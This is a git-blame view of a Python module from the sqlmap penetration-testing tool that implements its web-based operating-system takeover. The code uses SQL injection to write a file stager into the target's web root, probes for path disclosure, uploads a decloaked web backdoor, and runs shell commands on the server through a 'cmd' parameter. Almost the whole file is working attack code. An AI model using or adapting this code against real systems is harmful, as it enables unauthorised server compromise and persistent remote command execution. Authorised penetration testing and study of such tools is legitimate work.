2013-02-14 15:32:17 +04:00
|
|
|
#!/usr/bin/env python
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
"""
|
2017-01-02 16:19:18 +03:00
|
|
|
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2010-01-14 17:03:16 +03:00
|
|
|
"""
|
|
|
|
|
|
|
|
import os
|
2015-05-19 19:40:45 +03:00
|
|
|
import posixpath
|
2010-01-14 17:03:16 +03:00
|
|
|
import re
|
2012-12-13 16:19:47 +04:00
|
|
|
import StringIO
|
2015-11-29 00:42:25 +03:00
|
|
|
import tempfile
|
2015-05-19 19:40:45 +03:00
|
|
|
import urlparse
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-01-28 19:56:00 +03:00
|
|
|
from extra.cloak.cloak import decloak
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.agent import agent
|
2012-07-13 13:23:21 +04:00
|
|
|
from lib.core.common import arrayizeValue
|
2011-04-23 20:25:09 +04:00
|
|
|
from lib.core.common import Backend
|
2010-11-24 14:38:27 +03:00
|
|
|
from lib.core.common import extractRegexResult
|
2014-01-13 21:12:37 +04:00
|
|
|
from lib.core.common import getAutoDirectories
|
|
|
|
from lib.core.common import getManualDirectories
|
2012-10-29 13:48:49 +04:00
|
|
|
from lib.core.common import getPublicTypeMembers
|
2012-07-20 19:20:17 +04:00
|
|
|
from lib.core.common import getSQLSnippet
|
2012-10-30 03:37:43 +04:00
|
|
|
from lib.core.common import getUnicode
|
2010-02-04 17:37:00 +03:00
|
|
|
from lib.core.common import ntToPosixSlashes
|
2010-12-15 15:50:56 +03:00
|
|
|
from lib.core.common import isTechniqueAvailable
|
2010-04-22 14:31:33 +04:00
|
|
|
from lib.core.common import isWindowsDriveLetterPath
|
2010-02-03 19:10:09 +03:00
|
|
|
from lib.core.common import normalizePath
|
2017-04-06 12:33:59 +03:00
|
|
|
from lib.core.common import parseFilePaths
|
2010-02-04 17:37:00 +03:00
|
|
|
from lib.core.common import posixToNtSlashes
|
2010-12-05 15:24:23 +03:00
|
|
|
from lib.core.common import randomInt
|
2010-02-25 13:33:41 +03:00
|
|
|
from lib.core.common import randomStr
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.common import readInput
|
2012-07-13 12:35:22 +04:00
|
|
|
from lib.core.common import singleTimeWarnMessage
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.convert import hexencode
|
2012-10-30 04:26:19 +04:00
|
|
|
from lib.core.convert import utf8encode
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import paths
|
2012-07-20 19:20:17 +04:00
|
|
|
from lib.core.enums import DBMS
|
2017-04-06 12:33:59 +03:00
|
|
|
from lib.core.enums import HTTP_HEADER
|
2011-04-23 20:25:09 +04:00
|
|
|
from lib.core.enums import OS
|
2011-02-02 16:34:09 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2017-04-06 12:33:59 +03:00
|
|
|
from lib.core.enums import PLACE
|
2012-10-29 13:48:49 +04:00
|
|
|
from lib.core.enums import WEB_API
|
2014-06-29 02:27:23 +04:00
|
|
|
from lib.core.exception import SqlmapNoneDataException
|
2013-03-19 22:24:14 +04:00
|
|
|
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
|
2012-10-29 13:48:49 +04:00
|
|
|
from lib.core.settings import EVENTVALIDATION_REGEX
|
|
|
|
from lib.core.settings import VIEWSTATE_REGEX
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.request.connect import Connect as Request
|
2014-08-21 03:12:44 +04:00
|
|
|
from thirdparty.oset.pyoset import oset
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
|
|
|
|
class Web:
|
|
|
|
"""
|
|
|
|
This class defines web-oriented OS takeover functionalities for
|
|
|
|
plugins.
|
|
|
|
"""
|
|
|
|
|
|
|
|
def __init__(self):
|
2011-04-30 17:20:05 +04:00
|
|
|
self.webApi = None
|
|
|
|
self.webBaseUrl = None
|
2010-01-14 17:03:16 +03:00
|
|
|
self.webBackdoorUrl = None
|
2012-07-11 17:08:51 +04:00
|
|
|
self.webBackdoorFilePath = None
|
2011-04-30 17:20:05 +04:00
|
|
|
self.webStagerUrl = None
|
2012-07-11 17:08:51 +04:00
|
|
|
self.webStagerFilePath = None
|
2011-04-30 17:20:05 +04:00
|
|
|
self.webDirectory = None
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-01-14 17:33:08 +03:00
|
|
|
def webBackdoorRunCmd(self, cmd):
|
2010-01-14 17:03:16 +03:00
|
|
|
if self.webBackdoorUrl is None:
|
|
|
|
return
|
|
|
|
|
|
|
|
output = None
|
|
|
|
|
|
|
|
if not cmd:
|
|
|
|
cmd = conf.osCmd
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
|
2013-03-19 22:24:14 +04:00
|
|
|
page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
if page is not None:
|
2010-01-14 17:33:08 +03:00
|
|
|
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
if output:
|
2010-01-14 17:33:08 +03:00
|
|
|
output = output.group(1)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
return output
|
|
|
|
|
2012-12-13 16:19:47 +04:00
|
|
|
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
|
|
|
|
if filepath is not None:
|
|
|
|
if filepath.endswith('_'):
|
|
|
|
content = decloak(filepath) # cloaked file
|
|
|
|
else:
|
|
|
|
with open(filepath, "rb") as f:
|
|
|
|
content = f.read()
|
2013-02-14 22:31:14 +04:00
|
|
|
|
2012-12-13 16:19:47 +04:00
|
|
|
if content is not None:
|
|
|
|
stream = StringIO.StringIO(content) # string content
|
2013-02-14 22:31:14 +04:00
|
|
|
|
2012-12-13 16:19:47 +04:00
|
|
|
return self._webFileStreamUpload(stream, destFileName, directory)
|
2010-01-28 20:07:34 +03:00
|
|
|
|
2012-12-06 17:14:19 +04:00
|
|
|
def _webFileStreamUpload(self, stream, destFileName, directory):
|
2013-01-10 16:18:44 +04:00
|
|
|
stream.seek(0) # Rewind
|
2010-05-29 03:12:20 +04:00
|
|
|
|
2012-12-13 16:19:47 +04:00
|
|
|
try:
|
|
|
|
setattr(stream, "name", destFileName)
|
|
|
|
except TypeError:
|
|
|
|
pass
|
|
|
|
|
2012-10-29 13:48:49 +04:00
|
|
|
if self.webApi in getPublicTypeMembers(WEB_API, True):
|
2010-01-14 17:03:16 +03:00
|
|
|
multipartParams = {
|
|
|
|
"upload": "1",
|
2010-01-27 16:59:25 +03:00
|
|
|
"file": stream,
|
2010-01-14 17:03:16 +03:00
|
|
|
"uploadDir": directory,
|
|
|
|
}
|
2010-02-16 16:20:34 +03:00
|
|
|
|
2012-10-29 13:48:49 +04:00
|
|
|
if self.webApi == WEB_API.ASPX:
|
2010-11-24 17:20:43 +03:00
|
|
|
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
|
|
|
|
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
|
2010-11-24 14:38:27 +03:00
|
|
|
|
2016-09-28 16:39:34 +03:00
|
|
|
page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-01-28 20:07:34 +03:00
|
|
|
if "File uploaded" not in page:
|
2013-02-14 22:31:14 +04:00
|
|
|
warnMsg = "unable to upload the file through the web file "
|
|
|
|
warnMsg += "stager to '%s'" % directory
|
2010-01-14 17:03:16 +03:00
|
|
|
logger.warn(warnMsg)
|
2010-02-04 13:10:41 +03:00
|
|
|
return False
|
|
|
|
else:
|
|
|
|
return True
|
2013-02-14 22:31:14 +04:00
|
|
|
else:
|
2013-05-21 00:18:12 +04:00
|
|
|
logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
|
2013-02-14 22:31:14 +04:00
|
|
|
return False
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2012-12-06 17:14:19 +04:00
|
|
|
def _webFileInject(self, fileContent, fileName, directory):
|
2015-05-19 19:40:45 +03:00
|
|
|
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
|
2012-10-30 03:37:43 +04:00
|
|
|
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
2010-12-05 15:24:23 +03:00
|
|
|
query = ""
|
|
|
|
|
2010-12-15 15:50:56 +03:00
|
|
|
if isTechniqueAvailable(kb.technique):
|
2010-12-05 15:24:23 +03:00
|
|
|
where = kb.injection.data[kb.technique].where
|
|
|
|
|
2011-02-02 16:34:09 +03:00
|
|
|
if where == PAYLOAD.WHERE.NEGATIVE:
|
2010-12-05 15:24:23 +03:00
|
|
|
randInt = randomInt()
|
|
|
|
query += "OR %d=%d " % (randInt, randInt)
|
|
|
|
|
2014-03-21 15:35:30 +04:00
|
|
|
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
|
2010-12-05 15:24:23 +03:00
|
|
|
query = agent.prefixQuery(query)
|
|
|
|
query = agent.suffixQuery(query)
|
|
|
|
payload = agent.payload(newValue=query)
|
|
|
|
page = Request.queryPage(payload)
|
2012-07-06 19:18:22 +04:00
|
|
|
|
2010-02-16 16:24:09 +03:00
|
|
|
return page
|
2010-02-16 16:20:34 +03:00
|
|
|
|
2010-01-14 17:03:16 +03:00
|
|
|
def webInit(self):
|
|
|
|
"""
|
|
|
|
This method is used to write a web backdoor (agent) on a writable
|
|
|
|
remote directory within the web server document root.
|
|
|
|
"""
|
|
|
|
|
2010-10-18 01:06:52 +04:00
|
|
|
if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
|
2010-01-14 17:03:16 +03:00
|
|
|
return
|
|
|
|
|
2010-01-28 13:27:47 +03:00
|
|
|
self.checkDbmsOs()
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
default = None
|
2012-10-29 13:48:49 +04:00
|
|
|
choices = list(getPublicTypeMembers(WEB_API, True))
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
for ext in choices:
|
|
|
|
if conf.url.endswith(ext):
|
|
|
|
default = ext
|
2010-01-14 17:03:16 +03:00
|
|
|
break
|
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
if not default:
|
2012-12-13 16:19:47 +04:00
|
|
|
default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2011-04-23 20:25:09 +04:00
|
|
|
message = "which web application language does the web server "
|
2010-11-17 14:45:52 +03:00
|
|
|
message += "support?\n"
|
2010-11-16 16:46:46 +03:00
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
for count in xrange(len(choices)):
|
|
|
|
ext = choices[count]
|
|
|
|
message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))
|
2010-12-14 00:34:35 +03:00
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
if default == ext:
|
|
|
|
default = count + 1
|
|
|
|
|
|
|
|
message = message[:-1]
|
|
|
|
|
|
|
|
while True:
|
|
|
|
choice = readInput(message, default=str(default))
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
if not choice.isdigit():
|
2010-01-14 17:03:16 +03:00
|
|
|
logger.warn("invalid value, only digits are allowed")
|
|
|
|
|
2010-11-17 14:45:52 +03:00
|
|
|
elif int(choice) < 1 or int(choice) > len(choices):
|
|
|
|
logger.warn("invalid value, it must be between 1 and %d" % len(choices))
|
|
|
|
|
|
|
|
else:
|
|
|
|
self.webApi = choices[int(choice) - 1]
|
|
|
|
break
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2017-04-06 12:33:59 +03:00
|
|
|
if not kb.absFilePaths:
|
|
|
|
message = "do you want sqlmap to further try to "
|
|
|
|
message += "provoke the full path disclosure? [Y/n] "
|
|
|
|
|
2017-04-18 16:48:05 +03:00
|
|
|
if readInput(message, default='Y', boolean=True):
|
2017-04-06 12:33:59 +03:00
|
|
|
headers = {}
|
2017-04-06 12:37:42 +03:00
|
|
|
been = set([conf.url])
|
2017-04-06 12:33:59 +03:00
|
|
|
|
2017-07-17 23:24:51 +03:00
|
|
|
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
|
2017-04-06 12:33:59 +03:00
|
|
|
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
|
|
|
|
if url not in been:
|
|
|
|
try:
|
|
|
|
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
|
|
|
|
parseFilePaths(page)
|
|
|
|
except:
|
|
|
|
pass
|
|
|
|
finally:
|
|
|
|
been.add(url)
|
|
|
|
|
|
|
|
url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
|
|
|
|
if url not in been:
|
|
|
|
try:
|
|
|
|
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
|
|
|
|
parseFilePaths(page)
|
|
|
|
except:
|
|
|
|
pass
|
|
|
|
finally:
|
|
|
|
been.add(url)
|
|
|
|
|
|
|
|
for place in (PLACE.GET, PLACE.POST):
|
|
|
|
if place in conf.parameters:
|
|
|
|
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
|
|
|
|
if "[]" in value:
|
2017-06-05 17:28:19 +03:00
|
|
|
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
2017-04-06 12:33:59 +03:00
|
|
|
parseFilePaths(page)
|
|
|
|
|
|
|
|
cookie = None
|
|
|
|
if PLACE.COOKIE in conf.parameters:
|
|
|
|
cookie = conf.parameters[PLACE.COOKIE]
|
|
|
|
elif headers and HTTP_HEADER.SET_COOKIE in headers:
|
|
|
|
cookie = headers[HTTP_HEADER.SET_COOKIE]
|
|
|
|
|
|
|
|
if cookie:
|
|
|
|
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
|
|
|
|
if value != cookie:
|
2017-06-05 17:28:19 +03:00
|
|
|
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
2017-04-06 12:33:59 +03:00
|
|
|
parseFilePaths(page)
|
|
|
|
|
|
|
|
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
|
|
|
|
if value != cookie:
|
2017-06-05 17:28:19 +03:00
|
|
|
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
2017-04-06 12:33:59 +03:00
|
|
|
parseFilePaths(page)
|
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
directories = list(arrayizeValue(getManualDirectories()))
|
|
|
|
directories.extend(getAutoDirectories())
|
2014-08-21 03:12:44 +04:00
|
|
|
directories = list(oset(directories))
|
2010-02-25 18:22:41 +03:00
|
|
|
|
2016-09-29 22:14:28 +03:00
|
|
|
path = urlparse.urlparse(conf.url).path or '/'
|
|
|
|
if path != '/':
|
|
|
|
_ = []
|
|
|
|
for directory in directories:
|
|
|
|
_.append(directory)
|
|
|
|
if not directory.endswith(path):
|
|
|
|
_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
|
|
|
|
directories = _
|
|
|
|
|
2010-02-26 16:13:50 +03:00
|
|
|
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
2012-12-13 16:19:47 +04:00
|
|
|
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
2010-04-22 14:31:33 +04:00
|
|
|
|
2010-10-18 01:06:52 +04:00
|
|
|
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
2010-04-23 20:34:20 +04:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
for directory in directories:
|
2015-01-19 11:17:16 +03:00
|
|
|
if not directory:
|
|
|
|
continue
|
|
|
|
|
2015-05-19 19:40:45 +03:00
|
|
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
|
|
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
uploaded = False
|
|
|
|
directory = ntToPosixSlashes(normalizePath(directory))
|
2010-09-30 22:52:33 +04:00
|
|
|
|
2014-05-13 17:36:28 +04:00
|
|
|
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
|
2014-01-13 21:12:37 +04:00
|
|
|
directory = "/%s" % directory
|
2012-07-11 17:08:51 +04:00
|
|
|
|
2015-05-19 19:40:45 +03:00
|
|
|
if not directory.endswith('/'):
|
|
|
|
directory += '/'
|
|
|
|
|
2014-08-21 03:12:44 +04:00
|
|
|
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
|
2014-01-13 21:12:37 +04:00
|
|
|
infoMsg = "trying to upload the file stager on '%s' " % directory
|
2014-08-21 03:12:44 +04:00
|
|
|
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
|
2014-01-13 21:12:37 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
self._webFileInject(stagerContent, stagerName, directory)
|
2011-01-23 23:47:06 +03:00
|
|
|
|
2014-02-17 00:44:57 +04:00
|
|
|
for match in re.finditer('/', directory):
|
2014-02-17 00:57:14 +04:00
|
|
|
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
|
2014-02-17 00:44:57 +04:00
|
|
|
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
|
2014-02-17 01:04:12 +04:00
|
|
|
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
|
2014-01-13 21:12:37 +04:00
|
|
|
logger.debug(debugMsg)
|
2011-01-23 23:47:06 +03:00
|
|
|
|
2011-08-12 20:48:11 +04:00
|
|
|
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
2011-09-23 22:29:45 +04:00
|
|
|
uplPage = uplPage or ""
|
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
if "sqlmap file uploader" in uplPage:
|
|
|
|
uploaded = True
|
2014-02-10 13:59:57 +04:00
|
|
|
break
|
2014-01-13 21:12:37 +04:00
|
|
|
|
2014-08-21 03:12:44 +04:00
|
|
|
# Fall-back to UNION queries file upload method
|
2014-01-13 21:12:37 +04:00
|
|
|
if not uploaded:
|
|
|
|
warnMsg = "unable to upload the file stager "
|
|
|
|
warnMsg += "on '%s'" % directory
|
|
|
|
singleTimeWarnMessage(warnMsg)
|
|
|
|
|
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
|
|
|
infoMsg = "trying to upload the file stager on '%s' " % directory
|
2014-08-21 03:12:44 +04:00
|
|
|
infoMsg += "via UNION method"
|
2014-01-13 21:12:37 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2015-05-19 19:40:45 +03:00
|
|
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
|
|
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
|
|
|
|
2015-11-29 00:42:25 +03:00
|
|
|
handle, filename = tempfile.mkstemp()
|
2015-11-29 00:44:42 +03:00
|
|
|
os.close(handle)
|
2014-01-13 21:12:37 +04:00
|
|
|
|
2015-11-29 00:44:42 +03:00
|
|
|
with open(filename, "w+b") as f:
|
2014-01-13 21:12:37 +04:00
|
|
|
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
2015-08-03 18:21:35 +03:00
|
|
|
_ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
|
|
|
|
f.write(_)
|
2010-04-22 14:31:33 +04:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
|
2012-07-20 20:11:22 +04:00
|
|
|
|
2014-02-17 00:47:14 +04:00
|
|
|
for match in re.finditer('/', directory):
|
2014-02-17 00:57:14 +04:00
|
|
|
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
|
2014-02-17 00:47:14 +04:00
|
|
|
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
|
2012-10-29 18:09:05 +04:00
|
|
|
|
2014-02-17 01:04:12 +04:00
|
|
|
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
|
2014-01-13 21:12:37 +04:00
|
|
|
logger.debug(debugMsg)
|
2012-07-20 20:11:22 +04:00
|
|
|
|
|
|
|
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
|
|
|
uplPage = uplPage or ""
|
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
if "sqlmap file uploader" in uplPage:
|
|
|
|
uploaded = True
|
2014-02-10 13:59:57 +04:00
|
|
|
break
|
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
if not uploaded:
|
2015-05-19 19:40:45 +03:00
|
|
|
continue
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
if "<%" in uplPage or "<?" in uplPage:
|
|
|
|
warnMsg = "file stager uploaded on '%s', " % directory
|
|
|
|
warnMsg += "but not dynamically interpreted"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
continue
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
elif self.webApi == WEB_API.ASPX:
|
|
|
|
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
|
|
|
|
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
|
2010-11-24 17:20:43 +03:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
infoMsg = "the file stager has been successfully uploaded "
|
|
|
|
infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
|
|
|
|
logger.info(infoMsg)
|
2010-04-22 14:31:33 +04:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
if self.webApi == WEB_API.ASP:
|
|
|
|
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
|
2010-02-25 17:06:44 +03:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
if match:
|
|
|
|
backdoorDirectory = match.group(1)
|
|
|
|
else:
|
|
|
|
continue
|
|
|
|
|
|
|
|
_ = "tmpe%s.exe" % randomStr(lowercase=True)
|
|
|
|
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
|
2017-04-18 15:02:25 +03:00
|
|
|
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
|
2014-01-13 21:12:37 +04:00
|
|
|
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
|
|
|
|
self.webDirectory = backdoorDirectory
|
|
|
|
else:
|
|
|
|
continue
|
|
|
|
|
|
|
|
else:
|
|
|
|
if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
|
|
|
|
warnMsg = "backdoor has not been successfully uploaded "
|
|
|
|
warnMsg += "through the file stager possibly because "
|
|
|
|
warnMsg += "the user running the web server process "
|
|
|
|
warnMsg += "has not write privileges over the folder "
|
|
|
|
warnMsg += "where the user running the DBMS process "
|
|
|
|
warnMsg += "was able to upload the file stager or "
|
|
|
|
warnMsg += "because the DBMS and web server sit on "
|
|
|
|
warnMsg += "different servers"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
message = "do you want to try the same method used "
|
|
|
|
message += "for the file stager? [Y/n] "
|
|
|
|
|
2017-04-18 16:48:05 +03:00
|
|
|
if readInput(message, default='Y', boolean=True):
|
2014-01-13 21:12:37 +04:00
|
|
|
self._webFileInject(backdoorContent, backdoorName, directory)
|
2011-01-23 23:47:06 +03:00
|
|
|
else:
|
|
|
|
continue
|
2010-02-25 17:06:44 +03:00
|
|
|
|
2015-05-19 19:40:45 +03:00
|
|
|
self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
|
2014-01-13 21:12:37 +04:00
|
|
|
self.webDirectory = directory
|
2010-02-25 17:06:44 +03:00
|
|
|
|
2015-05-19 19:40:45 +03:00
|
|
|
self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
|
2010-11-03 13:08:27 +03:00
|
|
|
|
2014-01-13 21:12:37 +04:00
|
|
|
testStr = "command execution test"
|
|
|
|
output = self.webBackdoorRunCmd("echo %s" % testStr)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2014-06-29 02:27:23 +04:00
|
|
|
if output == "0":
|
|
|
|
warnMsg = "the backdoor has been uploaded but required privileges "
|
|
|
|
warnMsg += "for running the system commands are missing"
|
|
|
|
raise SqlmapNoneDataException(warnMsg)
|
|
|
|
elif output and testStr in output:
|
2014-01-13 21:12:37 +04:00
|
|
|
infoMsg = "the backdoor has been successfully "
|
|
|
|
else:
|
|
|
|
infoMsg = "the backdoor has probably been successfully "
|
|
|
|
|
|
|
|
infoMsg += "uploaded on '%s' - " % self.webDirectory
|
|
|
|
infoMsg += self.webBackdoorUrl
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
break
|